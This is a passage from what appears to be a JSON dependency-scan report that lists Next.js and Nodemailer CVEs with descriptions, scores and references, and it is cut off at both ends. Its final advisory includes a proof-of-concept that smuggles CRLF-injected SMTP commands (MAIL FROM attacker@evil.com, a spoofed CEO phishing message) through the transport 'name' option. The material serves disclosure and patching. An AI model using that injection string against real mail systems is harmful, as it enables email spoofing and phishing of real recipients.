exhaust disk space, causing denial of service. This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, including eviction of least-recently-used entries when the limit is exceeded. Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately possible, periodically clean `.next/cache/images` and/or reduce variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and `images.qualities`).", "Severity": "MEDIUM", "CweIDs": [ "CWE-400" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", "V40Score": 6.9 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-27980", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/39eb8e0ac498b48855a0430fbf4c22276a73b4bd", "https://github.com/vercel/next.js/releases/tag/v16.1.7", "https://github.com/vercel/next.js/security/advisories/GHSA-3x4c-7xq6-9pq8", "https://nvd.nist.gov/vuln/detail/CVE-2026-27980", "https://www.cve.org/CVERecord?id=CVE-2026-27980" ], "PublishedDate": "2026-03-18T01:16:04.957Z", "LastModifiedDate": "2026-03-18T19:52:54.307Z" }, { "VulnerabilityID": "CVE-2026-29057", "VendorIDs": [ "GHSA-ggv3-7p47-pfv8" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "16.1.7, 15.5.13", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29057", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:4074e32bdcb36d75198ac9560fe4244edba80bb6731805115c47dcfbb97b302f", "Title": "next.js: Next.js: HTTP request smuggling in rewrites", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS` request using `Transfer-Encoding: chunked` could trigger request boundary disagreement between the proxy and backend. This could allow request smuggling through rewritten routes. An attacker could smuggle a second request to unintended backend routes (for example, internal/admin endpoints), bypassing assumptions that only the configured rewrite destination/path is reachable. This does not impact applications hosted on providers that handle rewrites at the CDN level, such as Vercel. The vulnerability originated in an upstream library vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency’s behavior so `content-length: 0` is added only when both `content-length` and `transfer-encoding` are absent, and `transfer-encoding` is no longer removed in that code path. If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy, and/or enforce authentication/authorization on backend routes.", "Severity": "MEDIUM", "CweIDs": [ "CWE-444" ], "VendorSeverity": { "ghsa": 2, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N", "V40Score": 6.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "V3Score": 6.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-29057", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/dc98c04f376c6a1df76ec3e0a2d07edf4abdabd6", "https://github.com/vercel/next.js/releases/tag/v15.5.13", "https://github.com/vercel/next.js/releases/tag/v16.1.7", "https://github.com/vercel/next.js/security/advisories/GHSA-ggv3-7p47-pfv8", "https://nvd.nist.gov/vuln/detail/CVE-2026-29057", "https://www.cve.org/CVERecord?id=CVE-2026-29057" ], "PublishedDate": "2026-03-18T01:16:05.443Z", "LastModifiedDate": "2026-03-18T19:49:19.633Z" }, { "VulnerabilityID": "CVE-2026-44576", "VendorIDs": [ "GHSA-wfc6-r584-vfw7" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44576", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:3c9e2e46b20aad817d3abe8e7abd455ede89a3c4d8a51dc478704b39dba080bb", "Title": "Next.js vulnerable to cache poisoning in React Server Component responses", "Description": "Next.js is a React framework for building full-stack web applications. From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components can be vulnerable to cache poisoning when shared caches do not correctly partition response variants. Under affected conditions, an attacker can cause an RSC response to be served from the original URL and poison shared cache entries so later visitors receive component payloads instead of the expected HTML. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-436" ], "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L", "V3Score": 5.4 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7", "https://nvd.nist.gov/vuln/detail/CVE-2026-44576" ], "PublishedDate": "2026-05-13T17:16:23.04Z", "LastModifiedDate": "2026-05-14T13:44:18.27Z" }, { "VulnerabilityID": "CVE-2026-44577", "VendorIDs": [ "GHSA-h64f-5h5j-jqjh" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44577", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:9f08da120547fe06a6ff340ef05ca8e057af610a1e77041d7d119d2cea50fca0", "Title": "Next.js has a Denial of Service in the Image Optimization API", "Description": "Next.js is a React framework for building full-stack web applications. From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the /_next/image endpoint that match the images.localPatterns configuration (by default, all patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-770" ], "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh", "https://nvd.nist.gov/vuln/detail/CVE-2026-44577" ], "PublishedDate": "2026-05-13T17:16:23.173Z", "LastModifiedDate": "2026-05-13T20:00:59.993Z" }, { "VulnerabilityID": "CVE-2026-44580", "VendorIDs": [ "GHSA-gx5p-jg67-6x7h" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44580", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:271ac03a6853a4a85c0ed6629628a269cc75c889ec605033b36b7d5a63fe43fb", "Title": "Next.js has cross-site scripting in beforeInteractive scripts with untrusted input", "Description": "Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-79" ], "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h", "https://nvd.nist.gov/vuln/detail/CVE-2026-44580" ], "PublishedDate": "2026-05-13T18:16:18.26Z", "LastModifiedDate": "2026-05-14T18:33:34.17Z" }, { "VulnerabilityID": "CVE-2026-44581", "VendorIDs": [ "GHSA-ffhc-5mcf-pf4q" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44581", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:6f2ba23fa5d8ac9fe972f5c6d8249e305d739b420e200ac40e762626f914dc86", "Title": "Next.js vulnerable to cross-site scripting in App Router applications using CSP nonces", "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-79" ], "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 4.7 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q", "https://nvd.nist.gov/vuln/detail/CVE-2026-44581" ], "PublishedDate": "2026-05-13T18:16:18.4Z", "LastModifiedDate": "2026-05-14T18:30:24.34Z" }, { "VulnerabilityID": "CVE-2025-32421", "VendorIDs": [ "GHSA-qpjv-v59x-3qc4" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.24, 15.1.6", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-32421", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:64a9f428dd88df3e06576561410dff61f0fec0914799e7cfd4827204eba10d1b", "Title": "next.js: Next.js Race Condition to Cache Poisoning", "Description": "Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content development network and setting `cache-control: no-store` for all responses under risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.", "Severity": "LOW", "CweIDs": [ "CWE-362" ], "VendorSeverity": { "ghsa": 1, "redhat": 1 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "V3Score": 3.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "V3Score": 3.7 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-32421", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4", "https://nvd.nist.gov/vuln/detail/CVE-2025-32421", "https://vercel.com/changelog/cve-2025-32421", "https://www.cve.org/CVERecord?id=CVE-2025-32421" ], "PublishedDate": "2025-05-14T23:15:47.87Z", "LastModifiedDate": "2025-09-10T15:16:10.053Z" }, { "VulnerabilityID": "CVE-2025-48068", "VendorIDs": [ "GHSA-3h52-269p-cp9r" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.2.2, 14.2.30", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-48068", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:69e57f7a20f65a73ee7bd893aee36db195599076d8c92184edf8fe2c2707d9a6", "Title": "next.js: Information exposure in Next.js dev server due to lack of origin verification", "Description": "Next.js is a React framework for building full-stack web applications. In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, Next.js may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while npm run dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.", "Severity": "LOW", "CweIDs": [ "CWE-1385" ], "VendorSeverity": { "ghsa": 1, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N", "V40Score": 2.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "V3Score": 4.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "V3Score": 4.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-48068", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-3h52-269p-cp9r", "https://nvd.nist.gov/vuln/detail/CVE-2025-48068", "https://vercel.com/changelog/cve-2025-48068", "https://www.cve.org/CVERecord?id=CVE-2025-48068" ], "PublishedDate": "2025-05-30T04:15:48.51Z", "LastModifiedDate": "2025-09-10T15:17:38.677Z" }, { "VulnerabilityID": "CVE-2026-44572", "VendorIDs": [ "GHSA-3g8h-86w9-wvmq" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44572", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:7a874ea313c88fdfc018ce40fae507cbe374abff06d472b78d118b05b82c32ac", "Title": "Next.js's Middleware / Proxy redirects can be cache-poisoned", "Description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data header on a normal request to a path handled by middleware that returns a redirect. When that happened, the middleware/proxy could treat the request as a data request and replace the standard Location redirect header with the internal x-nextjs-redirect header. Browsers do not follow x-nextjs-redirect, so the response became an unusable redirect for normal clients. If the application was deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request could poison the cached redirect response for the affected path. Subsequent visitors could then receive a cached redirect response without a Location header, causing a denial of service for that redirect path until the cache entry expired or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "LOW", "CweIDs": [ "CWE-349" ], "VendorSeverity": { "ghsa": 1, "nvd": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 3.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq", "https://nvd.nist.gov/vuln/detail/CVE-2026-44572" ], "PublishedDate": "2026-05-13T16:16:58.8Z", "LastModifiedDate": "2026-05-15T15:46:08.98Z" }, { "VulnerabilityID": "CVE-2026-44582", "VendorIDs": [ "GHSA-vfv6-92ff-j949" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44582", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5355cf71971ed497dc9db80439cbc15aecaca5f44147444b410ea52d3870a09d", "Title": "Next.js vulnerable to cache poisoning via collisions in React Server Component cache-busting", "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can be vulnerable to cache poisoning in deployments that rely on shared caches with insufficient response partitioning. In affected conditions, collisions in the _rsc cache-busting value can allow an attacker to poison cache entries so users receive the wrong response variant for a given URL. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "LOW", "CweIDs": [ "CWE-328" ], "VendorSeverity": { "ghsa": 1 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 3.7 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949", "https://nvd.nist.gov/vuln/detail/CVE-2026-44582" ], "PublishedDate": "2026-05-13T18:16:19.037Z", "LastModifiedDate": "2026-05-14T18:15:03.26Z" }, { "VulnerabilityID": "CVE-2025-14874", "VendorIDs": [ "GHSA-rcmh-qjqh-p98v" ], "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "c243d03ecfce3c20" }, "InstalledVersion": "6.10.1", "FixedVersion": "7.0.11", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-14874", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:966cf7be028923c9a0026859ad211dbe6884c63fd7e0af1c79f4c19409cbe98a", "Title": "nodemailer: Nodemailer: Denial of service via crafted email address header", "Description": "A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser.", "Severity": "HIGH", "CweIDs": [ "CWE-703" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-14874", "https://bugzilla.redhat.com/show_bug.cgi?id=2418133", "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v", "https://nvd.nist.gov/vuln/detail/CVE-2025-14874", "https://www.cve.org/CVERecord?id=CVE-2025-14874" ], "PublishedDate": "2025-12-18T09:15:44.87Z", "LastModifiedDate": "2026-01-08T03:15:43.19Z" }, { "VulnerabilityID": "CVE-2025-13033", "VendorIDs": [ "GHSA-mm7p-fcc7-pg87" ], "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "c243d03ecfce3c20" }, "InstalledVersion": "6.10.1", "FixedVersion": "7.0.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-13033", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:718ace41991afee3a924eee3b40006635632701df5e1f2e2afabf15077a6d79b", "Title": "nodemailer: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict", "Description": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.", "Severity": "MEDIUM", "CweIDs": [ "CWE-1286" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P", "V40Score": 5.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:15979", "https://access.redhat.com/errata/RHSA-2026:3751", "https://access.redhat.com/security/cve/CVE-2025-13033", "https://bugzilla.redhat.com/show_bug.cgi?id=2402179", "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87", "https://nvd.nist.gov/vuln/detail/CVE-2025-13033", "https://www.cve.org/CVERecord?id=CVE-2025-13033" ], "PublishedDate": "2025-11-14T20:15:45.957Z", "LastModifiedDate": "2026-05-11T13:16:10.037Z" }, { "VulnerabilityID": "GHSA-vvjj-xcjg-gr5g", "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "c243d03ecfce3c20" }, "InstalledVersion": "6.10.1", "FixedVersion": "8.0.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-vvjj-xcjg-gr5g", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:17380daa219fcd2acb5ff13abdf591be99d5ba1498a2e827b85876cb23d42d77", "Title": "Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport name Option (EHLO/HELO) ", "Description": "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport `name` configuration option. The `name` value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (`\\r\\n`). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing an SMTP connection, the `name` option is concatenated directly into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand('EHLO ' + this.name);\n```\n\nThe `_sendCommand` method writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str + '\\r\\n', 'utf-8'));\n```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the `envelope.from` and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer = require('nodemailer');\nconst net = require('net');\n\n// Simple SMTP server to observe injected commands\nconst server = net.createServer(socket =\u003e {\n socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data =\u003e {\n const lines = data.toString().split('\\r\\n').filter(l =\u003e l);\n lines.forEach(line =\u003e {\n console.log('SMTP CMD:', line);\n if (line.startsWith('EHLO') || line.startsWith('HELO'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL FROM'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n else if (line === 'DATA')\n socket.write('354 Go\\r\\n');\n else if (line === '.')\n socket.write('250 OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221 Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0, '127.0.0.1', () =\u003e {\n const port = server.address().port;\n\n // Inject a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n host: '127.0.0.1',\n port: port,\n secure: false,\n name: 'legit.host\\r\\nMAIL FROM:\u003cattacker@evil.com\u003e\\r\\n'\n + 'RCPT TO:\u003cvictim@target.com\u003e\\r\\nDATA\\r\\n'\n + 'From: ceo@company.com\\r\\nTo: victim@target.com\\r\\n'\n + 'Subject: Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n from: 'legit@example.com',\n to: 'legit-recipient@example.com',\n subject: 'Normal email',\n text: 'Normal content'\n }, () =\u003e { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is affected:** Applications that allow users or external input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name settings are stored in databases\n- Applications loading SMTP config from environment variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n4. **Bypass application-level controls** on email recipients, since the injected commands are processed before the application's intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server's trust context.\n\n**Recommended fix:** Sanitize the `name` option by stripping or rejecting CRLF sequences, similar to how `envelope.from` and `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\r\\n]/g, '');\n```", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "V3Score": 4.9 } }, "References": [ "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e", "https://github.com/nodemailer/nodemailer/releases/tag/v8.0.5", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-vvjj-xcjg-gr5g" 